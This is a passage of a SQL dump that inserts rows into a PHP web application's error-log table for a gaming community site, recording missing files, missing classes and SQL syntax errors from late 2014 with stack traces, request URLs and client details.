`request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (219, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'nav_off.jpg\' found.', '64687d2149d7644cefcbbb0199949897d0c569f6', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'nav_off.jpg\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'nav_off.jpg\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.224.230', 0.008, '2014-11-17 18:40:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=nav_off.jpg', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (220, 'ERROR', 'You need to be logged in to view this ressource.', 'ce1bcbc4e2e244f775aa9a8fc9de471d0b058843', 1, '/home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php', 49, '#0 [internal function]: page_mojotrollz::page_user_start()\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'page_mojotrollz\', Array, 1, false, true)\n#3 {main}', '80.140.224.230', 0.02, '2014-11-20 13:42:57', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_start', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 8, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (221, 'SYSTEM\\LOG\\ERROR', 'Class not found: wizard_summary', 'fcb6c0c3300699e72185dd68943e40fd63fe9124', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'wizard_summary\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php(34): spl_autoload_call(\'wizard_summary\')\n#2 [internal function]: page_mojotrollz::page_wizard_summary()\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'page_mojotrollz\', Array, 1, false, true)\n#5 {main}', '37.24.148.197', 0.008, '2014-11-17 19:55:51', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=wizard_summary', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (222, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'dwarf.png\' found.', 'a4764a65d27e8492c0c6615995706a66eb3ca663', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'backgrounds\', \'dwarf.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'backgrounds\', \'dwarf.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.224.230', 0.016, '2014-11-17 20:43:14', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=backgrounds&id=dwarf.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (223, 'SYSTEM\\LOG\\ERROR', 'Class not found: wizard_guild', '3f35189cdd347c47f34a6a10909a3003894316a1', 1, '/home/mojotrolls/mojo_zero/src/web/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'wizard_guild\')\n#1 [internal function]: spl_autoload_call(\'wizard_guild\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/page/State.php(11): method_exists(\'wizard_guild\', \'css\')\n#3 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(16): SYSTEM\\PAGE\\State::get(\'1\')\n#4 [internal function]: SYSTEM\\API\\api_system::call_pages(\'1\')\n#5 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#7 {main}', '66.249.64.67', 0.25201, '2014-11-25 18:06:52', 'www.yeminy.org', 80, '/api.php?call=pages&group=1', 'a:0:{}', 'http://www.yeminy.org/', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 28, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (224, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'wowicons=bg.png\' found.', 'f4c41be143f20ad65ffae1b1857ca354166d0821', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 15, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons=bg.png\', NULL, true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons=bg.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.224.230', 0.028, '2014-11-18 18:37:35', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons=bg.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/mojotrollz/page/user_default/css/user_default.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (225, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'background_1.png\' found.', '54e1dfd38e7b2894060591bc6984657f8e64ef40', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'background_1.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'background_1.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.224.230', 0.004, '2014-11-18 19:07:22', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=background_1.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/mojotrollz/page/user_default/css/user_default.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (226, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\mangos_realm', '1a8c6f22dfc526345fbc97bd0b3fb05bb984acb0', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\maangos_real...)\n#1 /home/web/webdir/mojotrollz/mojotrollz/dbd/qq/ACC_DATA.php(11): spl_autoload_call(\'DBD\\\\maangos_real...)\n#2 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(6): DBD\\ACC_DATA::query()\n#3 /home/web/webdir/mojotrollz/mojotrollz/page/user_achievements_content/user_achievements_content.php(20): SYSTEM\\DB\\QQ::QQ(Array)\n#4 /home/web/webdir/mojotrollz/mojotrollz/page/user_achievements_content/user_achievements_content.php(215): user_achievements_content->menu_acc()\n#5 /home/web/webdir/mojotrollz/index.php(12): user_achievements_content->html()\n#6 {main}', '80.140.224.230', 0.008, '2014-11-18 19:39:56', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_achievements_content&menu=1&filter=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (227, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'group = 1\' at line 1', '916837ec8c3a0a0e216c60eb460560692a253aa8', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(41): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM m...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM m...\')\n#2 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(26): SYSTEM\\DB\\QQ::QQ()\n#3 /home/web/webdir/mojotrollz/mojotrollz/page/user_achievements_content/user_achievements_content.php(19): SYSTEM\\DB\\QQ::Q1()\n#4 /home/web/webdir/mojotrollz/mojotrollz/page/user_achievements_content/user_achievements_content.php(321): user_achievements_content->menu_acc()\n#5 /home/web/webdir/mojotrollz/index.php(12): user_achievements_content->html()\n#6 {main}', '80.140.224.230', 0.028, '2014-11-18 22:04:31', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_achievements_content&menu=1&filter=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (228, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\host_mojotrollz', 'f15e4c5382a80829748fe813801823ad992e7f88', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\hoost_mojotr...)\n#1 /home/web/webdir/mojotrollz/mojotrollz/dbd/qq/ACC_DATA.php(11): spl_autoload_call(\'DBD\\\\hoost_mojotr...)\n#2 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(6): DBD\\ACC_DATA::query()\n#3 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(26): SYSTEM\\DB\\QQ::QQ()\n#4 /home/web/webdir/mojotrollz/mojotrollz/page/user_achievements_content/user_achievements_content.php(19): SYSTEM\\DB\\QQ::Q1()\n#5 /home/web/webdir/mojotrollz/mojotrollz/page/user_achievements_content/user_achievements_content.php(321): user_achievements_content->menu_acc()\n#6 /home/web/webdir/mojotrollz/index.php(12): user_achievements_content->html()\n#7 {main}', '80.140.224.230', 0.024, '2014-12-15 20:58:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_achievements_content&menu=1&filter=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (229, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'?\' at line 1', '45719910ef4a383d41085bfa0908076d3ef2ab87', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(41): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM m...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM m...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_achievements_content/user_achievements_content.php(19): SYSTEM\\DB\\QQ::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/page/user_achievements_content/user_achievements_content.php(324): user_achievements_content->menu_acc()\n#4 /home/web/webdir/mojotrollz/index.php(12): user_achievements_content->html()\n#5 {main}', '80.140.224.230', 0.012, '2014-11-18 22:09:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_achievements_content&menu=1&filter=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (231, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'mojologo2.png\' found.', 'fb33b3f9bb95c293038fae85a459176eb27972e4', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'mojologo2.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'mojologo2.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '93.204.81.49', 0.004, '2014-11-19 13:11:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=mojologo2.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (232, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'skills.png\' found.', '760cc9bb100f3b40e3cf318c26e737201782a651', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree\', \'skills.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree\', \'skills.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '129.206.199.36', 0.064, '2014-11-19 20:48:51', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree&id=skills.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (233, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'skills/ability_ghoulfrenzy.png\' found.', '5ae7e8c3424c4ecb61b9de04991a10f3f59daf84', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree\', \'skills/ability_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree\', \'skills/ability_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '129.206.199.36', 0.012, '2014-11-19 20:50:16', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree&id=skills/ability_ghoulfrenzy.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 6, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (234, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'achievement_pvp\' found.', 'c23206990b9a5f4718785084c826a652523629e9', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 15, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'achievement_pvp\', \'a.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'achievement_pvp\', \'a.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '93.204.81.49', 0.008, '2014-11-20 13:44:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=achievement_pvp&id=a.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (235, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'achievements_pvp\' found.', '6c65b7238e66da1668cd592815f0b3d9857eb9bd', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 15, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'achievements_pv...\', \'a.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'achievements_pv...\', \'a.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '93.204.81.49', 0.052, '2014-11-20 11:22:11', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=achievements_pvp&id=a.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (236, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'a.png\' found.', '4850b648c4f35ad6ad0d198dfe806c6d61f7a196', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'achievements_pv...\', \'a.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'achievements_pv...\', \'a.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '93.204.81.49', 0.004, '2014-11-20 11:23:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=achievements_pvp&id=a.png', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 8, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (237, 'SYSTEM\\LOG\\ERROR', 'Class not found: user_shop_menu', '63037dea697bd4d0b1849e05a62392ed967eade1', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'user_shop_menu\')\n#1 [internal function]: spl_autoload_call(\'user_shop_menu\')\n#2 /home/web/webdir/mojotrollz/system/page/State.php(11): method_exists(\'user_shop_menu\', \'css\')\n#3 /home/web/webdir/mojotrollz/system/api/api_system.php(16): SYSTEM\\PAGE\\State::get(\'2\')\n#4 [internal function]: SYSTEM\\API\\api_system::call_pages(\'2\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#7 {main}', '93.204.81.49', 0.076, '2014-11-20 14:23:29', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=pages&group=2', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 5, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (238, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ok.png\' found.', '3b9d74c5c4af51786b5a8685ed7a06ca36711b8d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'ok.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'ok.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.008, '2014-11-20 15:00:32', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=ok.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (239, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'fail.png\' found.', 'a925b3bc5908f216829405e7624d5d0389b81766', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'fail.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'fail.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.012, '2014-11-20 15:17:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=fail.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (241, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 3; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=search&search=defias', 'e1afff554a224a3e1ec13641ef219c624cd0f809', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '93.204.81.49', 0.072, 